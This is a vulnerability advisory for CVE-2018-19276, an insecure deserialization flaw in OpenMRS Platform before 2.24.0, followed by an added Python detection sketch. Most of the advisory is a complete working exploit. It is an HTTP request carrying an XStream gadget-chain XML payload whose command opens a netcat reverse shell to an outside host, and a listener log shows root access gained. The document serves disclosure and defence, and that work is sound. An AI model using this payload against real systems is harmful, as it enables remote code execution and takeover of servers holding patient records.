
"OpenMRS Platform < 2.24.0 - Insecure Object Deserialization"

Author: "Bishop Fox"
Platform: java
Release date: 2019-02-05


Insecure Object Deserialization on the OpenMRS Platform
Vulnerability Details
CVE ID: CVE-2018-19276

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-502

CVSS Base Score: 10.0 

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

JAVA 8 ENVIRONMENT
By sending an XML payload in the body of a request to the REST API provided by the application, an attacker could execute arbitrary commands on the remote system. The request below could be used to exploit the vulnerability:


POST /openmrs/ws/rest/v1/xxxxxx HTTP/1.1
Host: HOST
Content-Type: text/xml

<map>
 <entry>
   <jdk.nashorn.internal.objects.NativeString>
     <flags>0</flags>
     <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
       <dataHandler>
         <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
           <is class="javax.crypto.CipherInputStream">
             <cipher class="javax.crypto.NullCipher">
               <initialized>false</initialized>
               <opmode>0</opmode>
               <serviceIterator class="javax.imageio.spi.FilterIterator">
                 <iter class="javax.imageio.spi.FilterIterator">
                   <iter class="java.util.Collections$EmptyIterator"/>
                   <next class="java.lang.ProcessBuilder">
                     <command>
                       <string>/bin/sh</string>
                       <string>-c</string>
                       <string>nc -e /bin/sh 172.16.32.3 8000</string>
                     </command>
                     <redirectErrorStream>false</redirectErrorStream>
                   </next>
                 </iter>
                 <filter class="javax.imageio.ImageIO$ContainsFilter">
                   <method>
                     <class>java.lang.ProcessBuilder</class>
                     <name>start</name>
                     <parameter-types/>
                   </method>
                   <name>foo</name>
                 </filter>
                 <next class="string">foo</next>
               </serviceIterator>
               <lock/>
             </cipher>
             <input class="java.lang.ProcessBuilder$NullInputStream"/>
             <ibuffer></ibuffer>
             <done>false</done>
             <ostart>0</ostart>
             <ofinish>0</ofinish>
             <closed>false</closed>
           </is>
           <consumed>false</consumed>
         </dataSource>
         <transferFlavors/>
       </dataHandler>
       <dataLen>0</dataLen>
     </value>
   </jdk.nashorn.internal.objects.NativeString>
   <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
 </entry>
 <entry>
   <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
 </entry>
</map>

The payload above was generated with the marshalsec tool and adapted to use multiple arguments, because the original payload would not work well if the attacker needs to send several arguments to a Linux host. After the payload was sent, the handler successfully received a response:

~ » nc -vlp 8000
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 5DE4 9A26 3868 367D 8104 B043 CE14 BAD6 5CC9 DE51
Ncat: Listening on :::8000
Ncat: Listening on 0.0.0.0:8000
Ncat: Connection from 172.16.32.2.
Ncat: Connection from 172.16.32.2:52434.
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/local/tomcat


The response should contain an error message similar to the one below:


{"error":{"message":"[Could not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling exception; nested exception is com.thoughtworks.xstream.converters.ConversionException: java.lang.String cannot be cast to java.security.Provider$Service
omitted for brevity


The response above showed that the REST Web Services module was unable to process the request properly. However, the payload was deserialized before the exception was caught by the exception handler, which allowed the team to gain shell access.
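
A detection-side sketch for the request and response shown above, added here as an example and not part of the original advisory or of OpenMRS: it flags XML bodies posted to the REST endpoint that name package-qualified Java types, and records whether the response carried the XStream error. The function names, the empty default allowlist and the sample request and response bodies are assumptions constructed for illustration.

```python
import re

REST_PREFIX = "/openmrs/ws/rest/v1/"   # endpoint prefix from the request above
XSTREAM_ERROR_MARKERS = (              # substrings of the error response above
    "XStream unmarshalling exception",
    "com.thoughtworks.xstream.converters.ConversionException",
)

TAG = re.compile(r"<\s*([A-Za-z_][\w.$-]*)")                      # opening tags only
CLASS_ATTR = re.compile(r"""\bclass\s*=\s*["']([^"']+)["']""")    # class="..." attributes
CLASS_ELEM = re.compile(r"<class>\s*([^<\s]+)\s*</class>")        # <class>...</class> text
JAVA_TYPE = re.compile(r"[A-Za-z_]\w*(?:\.[A-Za-z_$][\w$]*)+")    # dotted Java type name


def referenced_types(body, allowed=frozenset()):
    """Package-qualified Java types named by an XML body, minus `allowed`.

    Regexes are used instead of an XML parser so that truncated or malformed
    bodies are still inspected and nothing in the body is ever expanded.
    """
    names = TAG.findall(body) + CLASS_ATTR.findall(body) + CLASS_ELEM.findall(body)
    found = set()
    for name in names:
        name = name.replace("_-", "$")  # XStream writes '$' as '_-' in element names
        if JAVA_TYPE.fullmatch(name) and name not in allowed:
            found.add(name)
    return sorted(found)


def triage(method, path, content_type, request_body, response_body):
    """Return a finding dict for a suspicious REST call, or None."""
    if method.upper() != "POST" or not path.startswith(REST_PREFIX):
        return None
    if "xml" not in content_type.lower():
        return None
    types = referenced_types(request_body)
    if not types:
        return None
    return {
        "path": path,
        "types": types,
        # An error response is not evidence that the request was harmless: in
        # the advisory the body was deserialized before the exception surfaced.
        "reached_unmarshaller": any(m in response_body for m in XSTREAM_ERROR_MARKERS),
        "action": "investigate-host",
    }


# Constructed sample: a shortened, deliberately truncated body that names some of
# the types from the request above, with the command replaced by a placeholder.
SAMPLE_REQUEST_BODY = """<map>
 <entry>
   <jdk.nashorn.internal.objects.NativeString>
     <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
       <next class="java.lang.ProcessBuilder">
         <command><string>PLACEHOLDER</string></command>
       </next>
       <method><class>java.lang.ProcessBuilder</class><name>start</name></method>
     </value>
   </jdk.nashorn.internal.objects.NativeString>
 </entry>
"""
# Abridged from the error response quoted above.
SAMPLE_RESPONSE_BODY = (
    '{"error":{"message":"[Could not read [class org.openmrs.module.webservices.rest.'
    'SimpleObject]; nested exception is org.springframework.oxm.UnmarshallingFailure'
    'Exception: XStream unmarshalling exception; nested exception is ..."}}'
)
# Constructed benign body: plain map entries with no qualified type names.
BENIGN_BODY = "<map><entry><string>gender</string><string>F</string></entry></map>"

if __name__ == "__main__":
    print(triage("POST", "/openmrs/ws/rest/v1/xxxxxx", "text/xml",
                 SAMPLE_REQUEST_BODY, SAMPLE_RESPONSE_BODY))
```

The `allowed` parameter is where a deployment would list any qualified type names its own clients legitimately send; it is left empty here because the page names none.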